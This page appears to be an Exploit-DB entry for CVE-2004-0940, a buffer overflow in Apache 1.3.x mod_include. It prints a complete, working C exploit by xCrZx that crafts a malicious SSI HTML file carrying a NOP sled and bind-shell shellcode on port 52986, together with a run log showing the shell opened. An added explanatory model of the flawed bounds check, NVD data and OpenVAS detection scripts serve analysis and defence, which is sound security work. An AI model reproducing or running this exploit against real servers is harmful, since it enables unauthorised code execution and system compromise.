Apache 1.3.x mod_include Local Buffer Overflow Vulnerability
2004-10-18T00:00:00
ID: EDB-ID:24694 | Type: exploitdb | Reporter: xCrZx | Modified: 2004-10-18T00:00:00
Description
Apache 1.3.x mod_include Local Buffer Overflow Vulnerability. CVE-2004-0940. Local exploit for the Linux platform.
source: http://www.securityfocus.com/bid/11471/info
The problem presents itself when the affected module attempts to parse mod_include-specific tag values. A failure to properly validate the lengths of user-supplied tag strings before copying them into finite buffers facilitates the overflow.
A local attacker may leverage this issue to execute arbitrary code on the affected computer with the privileges of the affected Apache server.
/*********************************************************************************
local exploit for mod_include of apache 1.3.x *
written by xCrZx /18.10.2004/ *
bug found by xCrZx /18.10.2004/ *
*
y0das old shao lin techniq ownz u :) remember my words *
http://lbyte.ru/16-masta_killa-16-mastakilla-mad.mp3 *
*
Successfully tested on apache 1.3.31 under Linux RH9.0(Shrike) *
*********************************************************************************/
/*********************************************************************************
Technical Details: *
*
there is an overflow in get_tag function: *
*
static char *get_tag(pool *p, FILE *in, char *tag, int tagbuf_len, int dodecode) *
{ *
... *
term = c; *
while (1) { *
GET_CHAR(in, c, NULL, p); *
[1] if (t - tag == tagbuf_len) { *
*t = '\0'; *
return NULL; *
} *
// Want to accept \" as a valid character within a string. // *
if (c == '\\') { *
[2] *(t++) = c; // Add backslash // *
GET_CHAR(in, c, NULL, p); *
if (c == term) { // Only if // *
[3] *(--t) = c; // Replace backslash ONLY for terminator // *
} *
} *
else if (c == term) { *
break; *
} *
[4] *(t++) = c; *
} *
*t = '\0'; *
... *
*
as we can see there is a [1] check to determine the end of the tag buffer, *
but this check can be skipped when conditions [2] and [4] occur *
in the same iteration without condition [3]. *
*
So an attacker can create a malicious file to overflow the static buffer *
that tag points to and execute arbitrary code with the privileges of the *
httpd child process. *
*
Fix: *
[1*] if (t - tag >= tagbuf_len-1) { *
*
Notes: To activate mod_include you need to write "XBitHack on" in httpd.conf *
*
*********************************************************************************/
/*********************************************************************************
Example of work: *
*
[root@blacksand htdocs]# make 85mod_include *
cc 85mod_include.c -o 85mod_include *
[root@blacksand htdocs]# ./85mod_include 0xbfff8196 > evil.html *
[root@blacksand htdocs]# chmod +x evil.html *
[root@blacksand htdocs]# netstat -na|grep 52986 *
[root@blacksand htdocs]# telnet localhost 8080 *
Trying 127.0.0.1... *
Connected to localhost. *
Escape character is '^]'. *
GET /evil.html HTTP/1.0 *
^] *
telnet> q *
Connection closed. *
[root@blacksand htdocs]# netstat -na|grep 52986 *
tcp 0 0 0.0.0.0:52986 0.0.0.0:* LISTEN *
[root@blacksand htdocs]# *
*********************************************************************************/
/*********************************************************************************
Notes: ha1fsatan - ti 4elovek-kakashka :))) be co0l as always *
*********************************************************************************/
/*********************************************************************************
Personal hello to my parents :) *
*********************************************************************************/
/*********************************************************************************
Public shoutz to: m00 security, ech0 :), LByte, 0xbadc0ded and otherz *
*********************************************************************************/
#include <stdio.h>
#include <stdlib.h>
#include <string.h> /* strlen, memcpy, memset */
#include <fcntl.h>
#define EVILBUF 8202
#define HTMLTEXT 1000
#define HTML_FORMAT "<html>\n<!--#echo done=\"%s\" -->\nxCrZx 0wn U\n</html>"
#define AUTHOR "\n*** local exploit for mod_include of apache 1.3.x by xCrZx /18.10.2004/ ***\n"
int main(int argc, char **argv) {
char html[EVILBUF+HTMLTEXT];
char evilbuf[EVILBUF+1];
//can be changed
char shellcode[] =
// bind shell on 52986 port
"\x31\xc0"
"\x31\xdb\x53\x43\x53\x89\xd8\x40\x50\x89\xe1\xb0\x66\xcd\x80\x43"
"\x66\xc7\x44\x24\x02\xce\xfa\xd1\x6c\x24\x04\x6a\x10\x51\x50\x89"
"\xe1\xb0\x66\xcd\x80\x43\x43\xb0\x66\xcd\x80\x43\x89\x61\x08\xb0"
"\x66\xcd\x80\x93\x31\xc9\xb1\x03\x49\xb0\x3f\xcd\x80\x75\xf9\x68"
"\x2f\x73\x68\x20\x68\x2f\x62\x69\x6e\x88\x4c\x24\x07\x89\xe3\x51"
"\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80";
//execve /tmp/sh <- your own program
/*
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80"
"\xb0\x2e\xcd\x80\xeb\x15\x5b\x31"
"\xc0\x88\x43\x07\x89\x5b\x08\x89"
"\x43\x0c\x8d\x4b\x08\x31\xd2\xb0"
"\x0b\xcd\x80\xe8\xe6\xff\xff\xff"
"/tmp/sh";
*/
char NOP[] = "\x90\x40"; // special nops ;)
char evilpad[] = "\\CRZCRZCRZCRZC"; // trick ;)
int padding,xpad=0;
int i,fd;
long ret=0xbfff8688;
if(argc>1) ret=strtoul(argv[1],0,16);
else { fprintf(stderr,AUTHOR"\nUsage: %s <RET ADDR> > file.html\n\n",argv[0]);exit(0); }
padding=(EVILBUF-1-strlen(shellcode)-4-strlen(evilpad)+2);
while(1) {
if(padding%2==0) { padding/=2; break;}
else {padding--;xpad++;}
}
memset(html,0x0,sizeof html);
memset(evilbuf,0x0,sizeof evilbuf);
for(i=0;i<padding;i++)
memcpy(evilbuf+strlen(evilbuf),&NOP,2);
for(i=0;i<xpad;i++)
memcpy(evilbuf+strlen(evilbuf),(evilbuf[strlen(evilbuf)-1]==NOP[1])?(&NOP[0]):(&NOP[1]),1);
memcpy(evilbuf+strlen(evilbuf),&shellcode,sizeof shellcode);
memcpy(evilbuf+strlen(evilbuf),&evilpad,sizeof evilpad);
*(long*)&evilbuf[strlen(evilbuf)]=ret;
sprintf(html,HTML_FORMAT,evilbuf);
printf("%s",html);
return 0;
}
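The [1]-[4] reasoning in the Technical Details block is easier to follow with the loop in front of you. The program below is an added example written for this page; it is not Apache's code and not part of the exploit. It models the quoted get_tag() loop with a string in place of the FILE*, a tagbuf_len of 8 (assumed, to keep the arithmetic small) and a deliberately oversized backing buffer, and it records the highest index written instead of letting a write land out of bounds. Three length checks are compared: the original `==` check [1], the writeup's `>= tagbuf_len-1` fix [1*], and a hardened variant (this example's own assumption, not from the page) that re-tests the same bound before every store.

```c
#include <stdio.h>
#include <string.h>

/* Added example, not Apache's code: a reduced model of the get_tag() loop quoted in the
 * Technical Details above. It reads the tag body from a string instead of a FILE* and
 * records the highest buffer index written, so each check's effect is visible without
 * corrupting memory. */
enum check_mode {
    CHECK_ORIGINAL,    /* [1]  if (t - tag == tagbuf_len)     : the vulnerable check */
    CHECK_PATCHED,     /* [1*] if (t - tag >= tagbuf_len - 1) : the writeup's fix, once per iteration */
    CHECK_EVERY_WRITE  /* the [1*] bound re-tested before every store (hardened variant, this example's assumption) */
};

#define MODEL_BUF 512  /* much larger than any tagbuf_len used here: overflowing writes stay safe to observe */

struct result {
    int returned_null;  /* 1 if the length check fired (get_tag would return NULL) */
    int bytes_stored;   /* characters copied into tag before it stopped */
    int max_index;      /* highest index written, including the terminating NUL */
    char text[32];      /* what landed in tag (truncated for display) */
};

/* Store one byte at index pos and remember the highest index reached. */
static void store(char *buf, int pos, int *max_index, char ch)
{
    if (pos < MODEL_BUF) buf[pos] = ch;
    if (pos > *max_index) *max_index = pos;
}

/* The length check under the selected policy; 1 means get_tag would bail out with NULL. */
static int limit_hit(int pos, int tagbuf_len, enum check_mode mode)
{
    return mode == CHECK_ORIGINAL ? (pos == tagbuf_len) : (pos >= tagbuf_len - 1);
}

static struct result model_get_tag(const char *in, char term, int tagbuf_len, enum check_mode mode)
{
    char buf[MODEL_BUF];
    struct result r = { 0, 0, -1, "" };
    int pos = 0, n;                                  /* pos plays the role of t - tag */
    char c;

    while (*in != '\0') {                            /* EOF: GET_CHAR would leave the function */
        c = *in++;
        if (limit_hit(pos, tagbuf_len, mode)) {      /* [1] or [1*]: one check per iteration */
            store(buf, pos, &r.max_index, '\0'); r.returned_null = 1; break;
        }
        if (c == '\\') {
            store(buf, pos++, &r.max_index, c);      /* [2] add backslash */
            if (*in == '\0') break;
            c = *in++;
            if (c == term) store(buf, --pos, &r.max_index, c);  /* [3] replace backslash only for the terminator */
        } else if (c == term) {
            break;
        }
        if (mode == CHECK_EVERY_WRITE && limit_hit(pos, tagbuf_len, mode)) {  /* hardened: [2] may have used the last slot */
            store(buf, pos, &r.max_index, '\0'); r.returned_null = 1; break;
        }
        store(buf, pos++, &r.max_index, c);          /* [4] */
    }
    if (!r.returned_null) store(buf, pos, &r.max_index, '\0');
    r.bytes_stored = pos;
    n = pos < (int)sizeof r.text - 1 ? pos : (int)sizeof r.text - 1;
    memcpy(r.text, buf, (size_t)n);
    r.text[n] = '\0';
    return r;
}

int main(void)
{
    /* Constructed inputs: the tag body as get_tag() sees it after the opening quote. */
    static const struct { const char *label; const char *in; } cases[] = {
        { "escaped terminator",       "a\\\"b\" trailing" },
        { "plain tag, too long",      "abcdefghijklmnop" },
        { "odd offset + backslashes", "x\\a\\b\\c\\d\\e\\f\\g\\h" },
        { "even backslash pairs",     "\\a\\b\\c\\d\\e" },
    };
    static const char *names[] = { "original", "patched", "every-write" };
    const int tagbuf_len = 8;   /* tiny buffer so the arithmetic is easy to follow */
    size_t i;
    int mode;

    for (i = 0; i < sizeof cases / sizeof cases[0]; i++)
        for (mode = CHECK_ORIGINAL; mode <= CHECK_EVERY_WRITE; mode++) {
            struct result r = model_get_tag(cases[i].in, '"', tagbuf_len, (enum check_mode)mode);
            printf("%-26s %-12s null=%d stored=%2d max_index=%2d%s\n", cases[i].label, names[mode],
                   r.returned_null, r.bytes_stored, r.max_index,
                   r.max_index >= tagbuf_len ? "  <- wrote at or past tag[tagbuf_len]" : "");
        }
    return 0;
}
```

The "odd offset + backslashes" row is the case the writeup describes: one plain byte puts t - tag at an odd value, and every later backslash pair advances it by two, so the `==` test at [1] is stepped over and never fires again, while the `>=` test stops it at index 7. The "even backslash pairs" row shows why this model also includes the every-write variant: with the once-per-iteration [1*] check, a pair that begins at tagbuf_len - 2 still leaves t at tagbuf_len, and the terminating NUL lands at tag[tagbuf_len]; checking the bound before each of the two stores keeps the NUL at tagbuf_len - 1. The general lesson for review is that a bound tested once per loop iteration must account for the maximum number of bytes that iteration can write.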
{"cve": [{"lastseen": "2020-10-03T11:33:39", "description": "Buffer overflow in the get_tag function in mod_include for Apache 1.3.x to 1.3.32 allows local users who can create SSI documents to execute arbitrary code as the apache user via SSI (XSSI) documents that trigger a length calculation error.", "edition": 3, "cvss3": {}, "published": "2005-02-09T05:00:00", "title": "CVE-2004-0940", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2004-0940"], "modified": "2017-07-11T01:30:00", "cpe": ["cpe:/o:hp:hp-ux:11.11", "cpe:/a:apache:http_server:1.3.27", "cpe:/a:apache:http_server:1.3.3", "cpe:/a:apache:http_server:1.3.24", "cpe:/a:apache:http_server:1.3.22", "cpe:/o:hp:hp-ux:11.20", "cpe:/a:apache:http_server:1.3.17", "cpe:/o:hp:hp-ux:11.22", "cpe:/o:slackware:slackware_linux:8.1", "cpe:/a:openpkg:openpkg:current", "cpe:/a:openpkg:openpkg:2.0", "cpe:/o:slackware:slackware_linux:9.0", "cpe:/o:suse:suse_linux:9.1", "cpe:/o:slackware:slackware_linux:9.1", "cpe:/a:apache:http_server:1.3.6", "cpe:/a:apache:http_server:1.3.28", "cpe:/a:apache:http_server:1.3.14", "cpe:/o:slackware:slackware_linux:10.0", "cpe:/a:openpkg:openpkg:2.1", "cpe:/a:apache:http_server:1.3.1", "cpe:/a:apache:http_server:1.3.20", "cpe:/o:suse:suse_linux:8.1", "cpe:/a:apache:http_server:1.3.19", "cpe:/a:apache:http_server:1.3.25", "cpe:/o:suse:suse_linux:8.2", "cpe:/o:hp:hp-ux:11.00", "cpe:/o:slackware:slackware_linux:current", "cpe:/a:apache:http_server:1.3.4", "cpe:/o:suse:suse_linux:9.2", 
"cpe:/a:apache:http_server:1.3.12", "cpe:/a:openpkg:openpkg:2.2", "cpe:/a:apache:http_server:1.3.7", "cpe:/o:trustix:secure_linux:1.5", "cpe:/o:slackware:slackware_linux:8.0", "cpe:/a:apache:http_server:1.3.26", "cpe:/a:apache:http_server:1.3", "cpe:/a:apache:http_server:1.3.11", "cpe:/a:apache:http_server:1.3.31", "cpe:/a:apache:http_server:1.3.32", "cpe:/o:suse:suse_linux:8.0", "cpe:/a:apache:http_server:1.3.18", "cpe:/a:apache:http_server:1.3.23", "cpe:/a:apache:http_server:1.3.29", "cpe:/o:suse:suse_linux:9.0", "cpe:/a:apache:http_server:1.3.9"], "id": "CVE-2004-0940", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0940", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:apache:http_server:1.3.19:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:1.3.22:*:*:*:*:*:*:*", "cpe:2.3:o:slackware:slackware_linux:10.0:*:*:*:*:*:*:*", "cpe:2.3:o:suse:suse_linux:9.0:*:*:*:*:*:*:*", "cpe:2.3:o:suse:suse_linux:9.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:1.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:openpkg:openpkg:2.2:*:*:*:*:*:*:*", "cpe:2.3:o:suse:suse_linux:9.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:1.3:*:*:*:*:*:*:*", "cpe:2.3:o:hp:hp-ux:11.20:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:1.3.27:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:1.3.29:*:*:*:*:*:*:*", "cpe:2.3:a:openpkg:openpkg:current:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:1.3.3:*:*:*:*:*:*:*", "cpe:2.3:o:slackware:slackware_linux:8.1:*:*:*:*:*:*:*", "cpe:2.3:o:slackware:slackware_linux:9.0:*:*:*:*:*:*:*", "cpe:2.3:o:slackware:slackware_linux:8.0:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:1.3.24:*:*:*:*:*:*:*", "cpe:2.3:o:hp:hp-ux:11.00:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:1.3.6:*:*:*:*:*:*:*", "cpe:2.3:o:hp:hp-ux:11.11:*:*:*:*:*:*:*", "cpe:2.3:o:suse:suse_linux:8.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:1.3.31:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:1.3.26:*:*:*:*:*:*:*", "cpe:2.3:o:suse:suse_linux:8.2:*:*:*:*:*:*:*", 
"cpe:2.3:a:apache:http_server:1.3.12:*:*:*:*:*:*:*", "cpe:2.3:o:suse:suse_linux:8.0:*:*:*:*:*:*:*", "cpe:2.3:a:openpkg:openpkg:2.0:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:1.3.17:*:*:*:*:*:*:*", "cpe:2.3:o:slackware:slackware_linux:9.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:1.3.28:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:1.3.20:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:1.3.23:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:1.3.25:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:1.3.9:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:1.3.14:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:1.3.32:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:1.3.11:*:*:*:*:*:*:*", "cpe:2.3:o:suse:suse_linux:9.0:*:x86_64:*:*:*:*:*", "cpe:2.3:o:trustix:secure_linux:1.5:*:*:*:*:*:*:*", "cpe:2.3:a:openpkg:openpkg:2.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:1.3.7:*:dev:*:*:*:*:*", "cpe:2.3:o:slackware:slackware_linux:current:*:*:*:*:*:*:*", "cpe:2.3:o:hp:hp-ux:11.22:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:1.3.18:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:1.3.4:*:*:*:*:*:*:*"]}], "openvas": [{"lastseen": "2020-05-12T15:08:24", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0940"], "description": "The remote web server appears to be running a version of Apache that is older\n than version 1.3.33.", "modified": "2020-05-08T00:00:00", "published": "2005-11-03T00:00:00", "id": "OPENVAS:136141256231015554", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231015554", "type": "openvas", "title": "Apache mod_include privilege escalation", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Apache mod_include privilege escalation\n#\n# Authors:\n# David Maciejak <david dot maciejak at kyxar dot fr>\n# based on work from (C) Tenable Network Security\n#\n# Copyright:\n# Copyright (C) 2004 David Maciejak\n#\n# This program is free software; you can redistribute it and/or modify\n# it 
under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\n# Ref: Crazy Einstein\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.15554\");\n script_version(\"2020-05-08T08:34:44+0000\");\n script_tag(name:\"last_modification\", value:\"2020-05-08 08:34:44 +0000 (Fri, 08 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2005-11-03 14:08:04 +0100 (Thu, 03 Nov 2005)\");\n script_bugtraq_id(11471);\n script_cve_id(\"CVE-2004-0940\");\n script_tag(name:\"cvss_base\", value:\"6.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"Apache mod_include privilege escalation\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2004 David Maciejak\");\n script_family(\"Web Servers\");\n script_dependencies(\"secpod_apache_detect.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"apache/installed\");\n\n script_tag(name:\"summary\", value:\"The remote web server appears to be running a version of Apache that is older\n than version 1.3.33.\");\n\n script_tag(name:\"insight\", value:\"This version is vulnerable to a local buffer overflow in the get_tag()\n function of the module 'mod_include' when a specially crafted document\n with malformed server-side includes is requested though an HTTP session.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation can lead to 
execution of arbitrary code with\n escalated privileges, but requires that server-side includes (SSI) is enabled.\");\n\n script_tag(name:\"solution\", value:\"Disable SSI or upgrade to a newer version when available.\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\n\nport = http_get_port( default:80 );\nbanner = http_get_remote_headers( port:port );\nif( ! banner ) exit( 0 );\n\nserv = strstr( banner, \"Server\" );\nif( ereg( pattern:\"^Server:.*Apache(-AdvancedExtranetServer)?/(1\\.([0-2]\\.|3\\.([0-9][^0-9]|[0-2][0-9]|3[0-2])))\", string:serv ) ) {\n security_message( port:port );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-12-08T11:44:12", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0940"], "description": "The remote web server appears to be running a version of Apache that is older\nthan version 1.3.33.\n\nThis version is vulnerable to a local buffer overflow in the get_tag()\nfunction of the module 'mod_include' when a specially crafted document \nwith malformed server-side includes is requested though an HTTP session.\n\nSuccessful exploitation can lead to execution of arbitrary code with \nescalated privileges, but requires that server-side includes (SSI) is enabled.", "modified": "2017-12-07T00:00:00", "published": "2005-11-03T00:00:00", "id": "OPENVAS:15554", "href": "http://plugins.openvas.org/nasl.php?oid=15554", "type": "openvas", "title": "Apache mod_include privilege escalation", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: apache_mod_include_priv_escalation.nasl 8023 2017-12-07 08:36:26Z teissa $\n# Description: Apache mod_include privilege escalation\n#\n# Authors:\n# David Maciejak <david dot maciejak at kyxar dot fr>\n# based on work from (C) Tenable Network Security\n#\n# Copyright:\n# Copyright (C) 2004 David Maciejak\n#\n# 
This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ntag_summary = \"The remote web server appears to be running a version of Apache that is older\nthan version 1.3.33.\n\nThis version is vulnerable to a local buffer overflow in the get_tag()\nfunction of the module 'mod_include' when a specially crafted document \nwith malformed server-side includes is requested though an HTTP session.\n\nSuccessful exploitation can lead to execution of arbitrary code with \nescalated privileges, but requires that server-side includes (SSI) is enabled.\";\n\ntag_solution = \"Disable SSI or upgrade to a newer version when available.\";\n\n# Ref: Crazy Einstein\n\nif(description)\n{\n script_id(15554);\n script_version(\"$Revision: 8023 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-07 09:36:26 +0100 (Thu, 07 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2005-11-03 14:08:04 +0100 (Thu, 03 Nov 2005)\");\n script_bugtraq_id(11471);\n script_cve_id(\"CVE-2004-0940\");\n script_tag(name:\"cvss_base\", value:\"6.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n name = \"Apache mod_include privilege escalation\";\n\n script_name(name);\n\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"This script is Copyright (C) 2004 David Maciejak\");\n 
script_family(\"Web Servers\");\n script_dependencies(\"http_version.nasl\");\n script_require_keys(\"www/apache\");\n script_require_ports(\"Services/www\", 80);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n exit(0);\n}\n\n#\n# The script code starts here\n#\ninclude(\"http_func.inc\");\ninclude(\"global_settings.inc\");\n\nport = get_http_port(default:80);\nif(!port)exit(0);\nif(!get_port_state(port))exit(0);\n\nbanner = get_http_banner(port: port);\nif(!banner)exit(0);\n\nserv = strstr(banner, \"Server\");\nif(ereg(pattern:\"^Server:.*Apache(-AdvancedExtranetServer)?/(1\\.([0-2]\\.|3\\.([0-9][^0-9]|[0-2][0-9]|3[0-2])))\", string:serv))\n {\n security_message(port);\n exit(0);\n }\n", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:50:01", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0940"], "description": "The remote host is missing an update to apache\nannounced via advisory DSA 594-1.", "modified": "2017-07-07T00:00:00", "published": "2008-01-17T00:00:00", "id": "OPENVAS:53282", "href": "http://plugins.openvas.org/nasl.php?oid=53282", "type": "openvas", "title": "Debian Security Advisory DSA 594-1 (apache)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_594_1.nasl 6616 2017-07-07 12:10:49Z cfischer $\n# Description: Auto-generated from advisory DSA 594-1\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2007 E-Soft Inc. 
http://www.securityspace.com\n# Text descriptions are largerly excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Two vulnerabilities have been identified in the Apache 1.3 webserver:\n\nCVE-2004-0940\n\nCrazy Einstein has discovered a vulnerability in the\nmod_include module, which can cause a buffer to be overflown and\ncould lead to the execution of arbitrary code.\n\nNO VULN ID\n\nLarry Cashdollar has discovered a potential buffer overflow in the\nhtpasswd utility, which could be exploited when user-supplied is\npassed to the program via a CGI (or PHP, or ePerl, ...) 
program.\n\nFor the stable distribution (woody) these problems have been fixed in\nversion 1.3.26-0woody6.\n\nFor the unstable distribution (sid) these problems have been fixed in\nversion 1.3.33-2.\n\nWe recommend that you upgrade your apache packages.\";\ntag_summary = \"The remote host is missing an update to apache\nannounced via advisory DSA 594-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%20594-1\";\n\nif(description)\n{\n script_id(53282);\n script_version(\"$Revision: 6616 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:10:49 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-01-17 22:45:44 +0100 (Thu, 17 Jan 2008)\");\n script_bugtraq_id(11471);\n script_cve_id(\"CVE-2004-0940\");\n script_tag(name:\"cvss_base\", value:\"6.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"Debian Security Advisory DSA 594-1 (apache)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"apache-doc\", ver:\"1.3.26-0woody6\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache\", ver:\"1.3.26-0woody6\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache-common\", ver:\"1.3.26-0woody6\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache-dev\", ver:\"1.3.26-0woody6\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:50:13", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0940"], "description": "The remote host is missing updates announced in\nadvisory GLSA 200411-03.", "modified": "2017-07-07T00:00:00", "published": "2008-09-24T00:00:00", "id": "OPENVAS:54724", "href": "http://plugins.openvas.org/nasl.php?oid=54724", "type": "openvas", "title": "Gentoo Security Advisory GLSA 200411-03 (apache)", "sourceData": "# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. 
http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"A buffer overflow vulnerability exists in mod_include which could possibly\nallow a local attacker to gain escalated privileges.\";\ntag_solution = \"All Apache users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=net-www/apache-1.3.32-r1'\n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20200411-03\nhttp://bugs.gentoo.org/show_bug.cgi?id=68564\nhttp://www.apacheweek.com/features/security-13\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 200411-03.\";\n\n 